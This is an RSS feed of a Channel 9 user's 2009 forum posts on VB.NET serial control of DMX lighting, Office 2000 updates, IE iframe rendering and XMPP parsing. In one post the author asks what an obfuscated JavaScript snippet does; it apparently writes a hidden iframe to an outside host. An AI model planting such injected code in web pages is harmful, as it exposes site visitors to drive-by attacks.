<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" media="screen" href="/App_Themes/default/rss.xslt"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:evnet="http://www.mscommunities.com/rssmodule/"><channel><title>Entries for ZippyV</title><atom:link rel="self" type="application/rss+xml" href="http://channel9.msdn.com/niners/zippyv/rss/default.aspx" /><image><url>http://mschnlnine.vo.llnwd.net/d1/Dev/App_Themes/C9/images/feedimage.png</url><title>Entries for ZippyV</title><link>http://channel9.msdn.com/Niners/zippyv/</link></image><description>Entries, comments and threads posted by ZippyV</description><link>http://channel9.msdn.com/Niners/zippyv/</link><language>en-us</language><pubDate>Sun, 22 Nov 2009 19:06:46 GMT</pubDate><lastBuildDate>Sun, 22 Nov 2009 19:06:46 GMT</lastBuildDate><generator>EvNet (EvNet, Version=1.0.3608.3122, Culture=neutral, PublicKeyToken=null)</generator><item><title>DMX512, serialport and .Net</title><description>&lt;p&gt;I've got &lt;a href="http://www.martin.com/product/product.asp?product=maniascx600"&gt;this device&lt;/a&gt; laying around in my room and last week I decided to try if I can control it using vb.net. The device is connected from a usb port on my laptop to the dmx port. It has a serial converter built in so Windows sees it as COM4. The problem is that my application doesn't work. I tried to implement the code based on &lt;a href="http://www.dmx512-online.com/packt.html"&gt;Ujjal's DMX512 page&lt;/a&gt;, did I make any mistake?&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;[code language="vb"]&lt;/p&gt;
&lt;p&gt;Public Sub New()&lt;br /&gt;&amp;nbsp;sp = New SerialPort("COM4", 250000, Parity.None, 8, StopBits.Two)&lt;br /&gt;&amp;nbsp;sp.Open()&lt;br /&gt;End Sub&lt;/p&gt;
&lt;p&gt;Public Sub Send(ByVal data As Byte())&lt;br /&gt;&amp;nbsp;'Send break time&lt;br /&gt;&amp;nbsp;sp.BreakState = True&lt;br /&gt;&amp;nbsp;Threading.Thread.Sleep(10)&lt;br /&gt;&amp;nbsp;sp.BreakState = False&lt;/p&gt;
&lt;p&gt;&amp;nbsp;'Send Mark After Break (MAB)&lt;br /&gt;&amp;nbsp;sp.Write(New Byte() {255}, 0, 1)&lt;br /&gt;&amp;nbsp;'Send Start Code (SC)&lt;br /&gt;&amp;nbsp;sp.StopBits = StopBits.Two&lt;br /&gt;&amp;nbsp;sp.Write(New Byte() {0}, 0, 1)&lt;/p&gt;
&lt;p&gt;&amp;nbsp;'Send dmx data&lt;br /&gt;&amp;nbsp;sp.Write(data, 0, data.Length)&lt;br /&gt;End Sub[/code]&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;The byte array that gets passed in is this one:&lt;/p&gt;
&lt;p&gt;[code language="vb"]&lt;/p&gt;
&lt;p&gt;With lSettings &lt;br /&gt;&amp;nbsp;.Add(8) ' Shutter open&lt;br /&gt;&amp;nbsp;.Add(255) ' 100%&lt;br /&gt;&amp;nbsp;.Add(24) ' Color wheel (red)&lt;br /&gt;&amp;nbsp;.Add(0) ' Gobo selection (open)&lt;br /&gt;&amp;nbsp;.Add(0) ' Gobo rotation type (stop)&lt;br /&gt;&amp;nbsp;.Add(128) ' Pan (neutral)&lt;br /&gt;&amp;nbsp;.Add(128) ' Tilt (neutral)&lt;br /&gt;End With[/code]&lt;/p&gt;&lt;img src="http://channel9.msdn.com/508205/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/TechOff/508205-DMX512-serialport-and-Net/</comments><link>http://channel9.msdn.com/forums/TechOff/508205-DMX512-serialport-and-Net/</link><pubDate>Sun, 22 Nov 2009 19:06:46 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/TechOff/508205-DMX512-serialport-and-Net/</guid><evnet:views>87</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/508205/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I've got this device laying around in my room and last week I decided to try if I can control it using vb.net. The device is connected from a usb port on my laptop to the dmx port. It has a serial converter built in so Windows sees it as COM4. The problem is that my application doesn't work. I tried&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>2</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/TechOff/508205-DMX512-serialport-and-Net/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/508205/Trackback.aspx</trackback:ping></item><item><title>Can't update Office 2000 [Can't update Office 2000]</title><description>&lt;p&gt;I installed Office 2000 on a virtual machine yesterday but to my surprise MicrosoftUpdate didn't update it. I looked for some service packs and now I need to install SP1a before&amp;nbsp;I can install any of the later service packs. The problem is that &lt;a href="http://www.microsoft.com/downloads/details.aspx?displaylang=nl&amp;amp;FamilyID=af6c8d03-7633-45b4-ab96-795ee656f2a2"&gt;this update &lt;/a&gt;tries to download &lt;a href="http://download.microsoft.com/download/office2000prem/SP/SR-1a/Win98/NL/DATA1.msp"&gt;another file&lt;/a&gt; which isn't available anymore.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Can anyone from Microsoft digg deep into the&amp;nbsp;private update archives and give me the full administrative update of &lt;strong&gt;Office 2000 Premium SP1a&lt;/strong&gt; for the &lt;strong&gt;DUTCH&lt;/strong&gt; version? Or make MicrosoftUpdate update it automatically.&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/500847-Cant-update-Office-2000/'&gt;Can't update Office 2000&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/500847/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/500847-Cant-update-Office-2000/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/500847-Cant-update-Office-2000/</link><pubDate>Wed, 21 Oct 2009 17:33:05 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/500847-Cant-update-Office-2000/</guid><evnet:views>354</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/500847/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I installed Office 2000 on a virtual machine yesterday but to my surprise MicrosoftUpdate didn't update it. I looked for some service packs and now I need to install SP1a before&amp;nbsp;I can install any of the later service packs. The problem is that this update tries to download another file which&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>5</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/500847-Cant-update-Office-2000/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/500847/Trackback.aspx</trackback:ping></item><item><title>Ajax and iframe problem in IE [Ajax and iframe problem in IE]</title><description>&lt;p&gt;I'm sending a file using ajax (which creates an iframe) and this is the result I get back in the iframe (innerHtml):&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;[code language="html"]&amp;lt;form action="/admin/images/ajaxupload" method="post" id="SubmitImageForm2"&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;lt;p&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name="Page" id="Page" value="2" type="hidden"&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name="x" id="x" type="hidden"&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name="y" id="y" type="hidden"&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name="w" id="w" type="hidden"&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name="h" id="h" type="hidden"&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name="ImageName" id="ImageName" value="bugatti-galibier-large_2.jpg" type="hidden"&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;img src="/images/uploads/bugatti-galibier-large_2.jpg" id="cropbox"&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;lt;input value="Send" type="submit"&amp;gt;&lt;br /&gt;&amp;nbsp;&amp;lt;/p&amp;gt;&lt;br /&gt;&amp;lt;/form&amp;gt;&lt;br /&gt;[/code]&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;This works in Firefox but Internet Explorer is giving me this:&lt;/p&gt;
&lt;p&gt;[code language="html"]&amp;lt;P&amp;gt; &lt;/p&gt;
&lt;p&gt;&amp;lt;IMG id=cropbox src="/images/uploads/2010-prius.jpg"&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;INPUT value=Send type=submit&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;/P&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;/FORM&amp;gt;[/code]&lt;/p&gt;
&lt;p&gt;Notice how the &amp;lt;p&amp;gt; does render while tags before and after it don't render. What's with the uppercase tags?&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/TechOff/500661-Ajax--iframe-problem-in-IE/'&gt;Ajax and iframe problem in IE&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/500661/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/TechOff/500661-Ajax--iframe-problem-in-IE/</comments><link>http://channel9.msdn.com/forums/TechOff/500661-Ajax--iframe-problem-in-IE/</link><pubDate>Wed, 21 Oct 2009 09:09:42 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/TechOff/500661-Ajax--iframe-problem-in-IE/</guid><evnet:views>136</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/500661/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I'm sending a file using ajax (which creates an iframe) and this is the result I get back in the iframe (innerHtml):
&amp;nbsp;
[code language="html"]&amp;lt;form action="/admin/images/ajaxupload" method="post" id="SubmitImageForm2"&amp;gt;&amp;nbsp;&amp;lt;p&amp;gt;&amp;nbsp;&amp;nbsp;&amp;lt;input name="Page" id="Page" value="2"&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>0</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/TechOff/500661-Ajax--iframe-problem-in-IE/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/500661/Trackback.aspx</trackback:ping></item><item><title>Review: shopping in the Microsoft online store [Review: shopping in the Microsoft online store]</title><description>&lt;p&gt;I decided to order something from Microsoft's new &lt;a href="https://emea.microsoftstore.com/nl/Microsoft/Digital-Media-Keyboard-3000"&gt;store website &lt;/a&gt;that was launched awhile ago. On Monday afternoon I purchased a new keyboard and Expression Web 3. Browsing through the website is awful: the website is slow even when there isn't much content displayed, when I want to switch the country to Belgium (dutch) it will still display&amp;nbsp;The Netherlands, the checkout process asks for my address even when I'm logged in using Passport and&amp;nbsp;tracing the package returns a 403 error. One positive point: the payment using my Visa card needed to be validated using my bank's device (it validates the transaction, my card and my PIN), most international webstores don't do this (like Amazon UK).&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Yesterday (Wednesday) I received my first package: Expression Web 3 (small LOL: the DVD only contains 180 MB data), nice package but it smells bad. Today (Thursday) the keyboard arrived, I saw a QUERTY keyboard picture but the sticker on the box assured me that "Picture of US keyboard for illustration purposes only and may differ from actual keyboard layout sold in your country". Sadly, the picture did not differ.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;But why did I buy a new keyboard? I'm happy with the Microsoft Office keyboard, it has dedicated buttons to launch Word,&amp;nbsp;Excel, Outlook, a browser, mute, logoff, sleep, cut, copy and paste buttons. Unfortunately Microsoft doesn't provide a driver in Vista.&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/490858-Review-shopping-in-the-Microsoft-online-store/'&gt;Review: shopping in the Microsoft online store&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/490858/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/490858-Review-shopping-in-the-Microsoft-online-store/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/490858-Review-shopping-in-the-Microsoft-online-store/</link><pubDate>Thu, 10 Sep 2009 12:08:15 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/490858-Review-shopping-in-the-Microsoft-online-store/</guid><evnet:views>900</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/490858/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I decided to order something from Microsoft's new store website that was launched awhile ago. On Monday afternoon I purchased a new keyboard and Expression Web 3. Browsing through the website is awful: the website is slow even when there isn't much content displayed, when I want to switch the&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>6</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/490858-Review-shopping-in-the-Microsoft-online-store/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/490858/Trackback.aspx</trackback:ping></item><item><title>Interpreting XML [Interpreting XML]</title><description>&lt;p&gt;I'm looking into XMPP at the moment. The protocol is basically about sending and retrieving data that is XML formatted. I've tried to read some data by deserializing it to a class but it doesn't work (attributes like xmlns or empty tags don't get deserialized).&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;For example:&lt;/p&gt;
&lt;p&gt;[code language="xml"]&amp;lt;stream:features&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&amp;lt;starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp; &amp;lt;required/&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&amp;lt;/starttls&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&amp;lt;mechanisms xmlns='urn:ietf:params:xml:ns:xmpp-sasl'&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp; &amp;lt;mechanism&amp;gt;DIGEST-MD5&amp;lt;/mechanism&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp; &amp;lt;mechanism&amp;gt;KERBEROS_V4&amp;lt;/mechanism&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp; &amp;lt;/mechanisms&amp;gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;/stream:features&amp;gt;[/code]&lt;/p&gt;
&lt;p&gt;What would be the best way to interpret this kind of XML?&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/TechOff/489549-Interpreting-XML/'&gt;Interpreting XML&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/489549/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/TechOff/489549-Interpreting-XML/</comments><link>http://channel9.msdn.com/forums/TechOff/489549-Interpreting-XML/</link><pubDate>Thu, 03 Sep 2009 23:25:44 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/TechOff/489549-Interpreting-XML/</guid><evnet:views>471</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/489549/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I'm looking into XMPP at the moment. The protocol is basically about sending and retrieving data that is XML formatted. I've tried to read some data by deserializing it to a class but it doesn't work (attributes like xmlns or empty tags don't get deserialized).
&amp;nbsp;
For example:
[code&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>8</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/TechOff/489549-Interpreting-XML/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/489549/Trackback.aspx</trackback:ping></item><item><title>Party @ Dovella's house [Party @ Dovella's house]</title><description>&lt;p&gt;&lt;a href="http://houseparty.com/windows7"&gt;http://houseparty.com/windows7&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;a rel="lightbox" href="http://www.neowin.net/images/uploaded/win7launchparty.png"&gt;&lt;img src="http://www.neowin.net/images/uploaded/win7launchparty.png" alt="" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Of course they skipped The Netherlands and Belgium but they didn't skip Italy!!!!!!&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/489434-Party--Dovellas-house/'&gt;Party @ Dovella's house&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/489434/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/489434-Party--Dovellas-house/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/489434-Party--Dovellas-house/</link><pubDate>Thu, 03 Sep 2009 10:54:28 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/489434-Party--Dovellas-house/</guid><evnet:views>1068</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/489434/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>http://houseparty.com/windows7
&amp;nbsp;

Of course they skipped The Netherlands and Belgium but they didn't skip Italy!!!!!!in reply to Party @ Dovella's house</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>44</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/489434-Party--Dovellas-house/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/489434/Trackback.aspx</trackback:ping></item><item><title>Lot's of tables [Lot's of tables]</title><description>&lt;p&gt;I saw this question on &lt;a href="http://serverfault.com/questions/52950/pointers-on-managing-database-with-4000-tables"&gt;Serverfault&lt;/a&gt;: "&lt;em&gt;I'm in the middle of designing a software system storing data in about 4000 tables in Microsoft SQL Server 2008."&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Even for an ERP system it looks like normalization taken too far or am I a n00b with my (on average) 15 table db design. I know some people on Channel 9 work with very big databases but how many tables do they contain?&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/TechOff/484680-Lots-of-tables/'&gt;Lot's of tables&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/484680/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/TechOff/484680-Lots-of-tables/</comments><link>http://channel9.msdn.com/forums/TechOff/484680-Lots-of-tables/</link><pubDate>Wed, 12 Aug 2009 13:26:10 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/TechOff/484680-Lots-of-tables/</guid><evnet:views>454</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/484680/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I saw this question on Serverfault: "I'm in the middle of designing a software system storing data in about 4000 tables in Microsoft SQL Server 2008."
&amp;nbsp;
Even for an ERP system it looks like normalization taken too far or am I a n00b with my (on average) 15 table db design. I know some people on&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>6</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/TechOff/484680-Lots-of-tables/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/484680/Trackback.aspx</trackback:ping></item><item><title>I didn't do it [I didn't do it]</title><description>&lt;p&gt;I swear I didn't do anything. Why is everyone looking at me?&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Feedback/482194-I-didnt-do-it/'&gt;I didn't do it&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/482194/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Feedback/482194-I-didnt-do-it/</comments><link>http://channel9.msdn.com/forums/Feedback/482194-I-didnt-do-it/</link><pubDate>Sat, 01 Aug 2009 22:32:56 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Feedback/482194-I-didnt-do-it/</guid><evnet:views>582</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/482194/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>I swear I didn't do anything. Why is everyone looking at me?in reply to I didn't do it</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>0</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Feedback/482194-I-didnt-do-it/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/482194/Trackback.aspx</trackback:ping></item><item><title>Follow the moonlanding, live [Follow the moonlanding, live]</title><description>&lt;p&gt;&lt;a href="http://www.wechoosethemoon.org/"&gt;http://www.wechoosethemoon.org/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;Still 71 hours before they arrive at the moon, in the meantime you can follow their radiochatter live.&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/479427-Follow-the-moonlanding-live/'&gt;Follow the moonlanding, live&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/479427/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/479427-Follow-the-moonlanding-live/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/479427-Follow-the-moonlanding-live/</link><pubDate>Fri, 17 Jul 2009 20:41:35 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/479427-Follow-the-moonlanding-live/</guid><evnet:views>1259</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/479427/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>http://www.wechoosethemoon.org/
&amp;nbsp;
Still 71 hours before they arrive at the moon, in the meantime you can follow their radiochatter live.in reply to Follow the moonlanding, live</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>2</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/479427-Follow-the-moonlanding-live/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/479427/Trackback.aspx</trackback:ping></item><item><title>OMG! Funny CSI clip [OMG! Funny CSI clip]</title><description>&lt;p&gt;&lt;object width="425" height="355"&gt;&lt;param name="movie" value="http://www.youtube.com/v/ygB0ZviqXac&amp;hl=en"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/ygB0ZviqXac&amp;hl=en" type="application/x-shockwave-flash" wmode="transparent" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/475453-Funny-CSI-clip/'&gt;OMG! Funny CSI clip&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/475453/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/475453-Funny-CSI-clip/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/475453-Funny-CSI-clip/</link><pubDate>Thu, 25 Jun 2009 13:58:56 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/475453-Funny-CSI-clip/</guid><evnet:views>782</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/475453/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>in reply to OMG! Funny CSI clip</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>23</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/475453-Funny-CSI-clip/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/475453/Trackback.aspx</trackback:ping></item><item><title>Dangerous javascript code? [Dangerous javascript code?]</title><description>&lt;p&gt;Here is a snippet of code I found on some website that virusscanners are complaining about. Can anyone find out what it does?&lt;/p&gt;
&lt;p&gt;eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('s.r(q(\'%l%1%m%3%e%n%2%6%c%3%i%a%9%4%0%0%d%f%b%b%0%g%3%3%2%8%0%g%3%2%e%i%0%g%3%j%8%2%0%f%h%5%h%5%b%1%8%7%2%w%j%d%4%d%9%6%y%1%7%0%4%a%x%5%5%6%4%2%1%u%4%0%a%5%6%c%0%p%k%2%a%9%v%1%c%1%t%1%k%1%0%p%f%6%4%1%7%7%2%8%9%o%l%b%1%m%3%e%n%2%o\'));',35,35,'u0074|u0069|u0065|u0072|u0068|u0030|u0020|u0064|u006e|u0022|u003d|u002f|u0073|u0070|u0061|u003a|u006f|u0038|u0063|u002e|u006c|u003c|u0066|u006d|u003e|u0079|unescape|write|document|u0062|u0067|u0076|u0078|u0031|u0077'.split('|')))&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/TechOff/475125-Dangerous-javascript-code/'&gt;Dangerous javascript code?&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/475125/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/TechOff/475125-Dangerous-javascript-code/</comments><link>http://channel9.msdn.com/forums/TechOff/475125-Dangerous-javascript-code/</link><pubDate>Tue, 23 Jun 2009 11:24:41 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/TechOff/475125-Dangerous-javascript-code/</guid><evnet:views>564</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/475125/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>Here is a snippet of code I found on some website that virusscanners are complaining about. Can anyone find out what it does?
eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return&amp;#8230;</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>6</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/TechOff/475125-Dangerous-javascript-code/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/475125/Trackback.aspx</trackback:ping></item><item><title>OMG! Chat on Channel9 with webcam! [OMG! Chat on Channel9 with webcam!]</title><description>&lt;p&gt;&lt;a href="http://tinychat.com/channel9"&gt;http://tinychat.com/channel9&lt;/a&gt;&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/471847-OMG-Chat-on-Channel9-with-webcam/'&gt;OMG! Chat on Channel9 with webcam!&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/471847/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/471847-OMG-Chat-on-Channel9-with-webcam/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/471847-OMG-Chat-on-Channel9-with-webcam/</link><pubDate>Wed, 03 Jun 2009 14:30:57 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/471847-OMG-Chat-on-Channel9-with-webcam/</guid><evnet:views>737</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/471847/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>http://tinychat.com/channel9in reply to OMG! Chat on Channel9 with webcam!</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>13</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/471847-OMG-Chat-on-Channel9-with-webcam/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/471847/Trackback.aspx</trackback:ping></item><item><title>Vista Resource Kit Tools download? [Vista Resource Kit Tools download?]</title><description>&lt;p&gt;Is it possible to download the tools that are provided with the Vista Resource Kit book?&lt;/p&gt;&lt;p&gt;in reply to &lt;a href='http://channel9.msdn.com/forums/Coffeehouse/471072-Vista-Resource-Kit-Tools-download/'&gt;Vista Resource Kit Tools download?&lt;/a&gt;&lt;/p&gt;&lt;img src="http://channel9.msdn.com/471072/WebViewBug.aspx?EVT=0" height="1" width="1" alt="" /&gt;</description><comments>http://channel9.msdn.com/forums/Coffeehouse/471072-Vista-Resource-Kit-Tools-download/</comments><link>http://channel9.msdn.com/forums/Coffeehouse/471072-Vista-Resource-Kit-Tools-download/</link><pubDate>Fri, 29 May 2009 15:19:27 GMT</pubDate><guid isPermaLink="false">http://channel9.msdn.com/forums/Coffeehouse/471072-Vista-Resource-Kit-Tools-download/</guid><evnet:views>568</evnet:views><evnet:viewtrackingurl>http://channel9.msdn.com/471072/WebViewBug.aspx?EVT=0</evnet:viewtrackingurl><evnet:previewtext>Is it possible to download the tools that are provided with the Vista Resource Kit book?in reply to Vista Resource Kit Tools download?</evnet:previewtext><dc:creator>ZippyV</dc:creator><slash:comments>0</slash:comments><wfw:commentRss>http://channel9.msdn.com/forums/Coffeehouse/471072-Vista-Resource-Kit-Tools-download/RSS/</wfw:commentRss><trackback:ping>http://channel9.msdn.com/471072/Trackback.aspx</trackback:ping></item><item><title>Hot patching [Hot 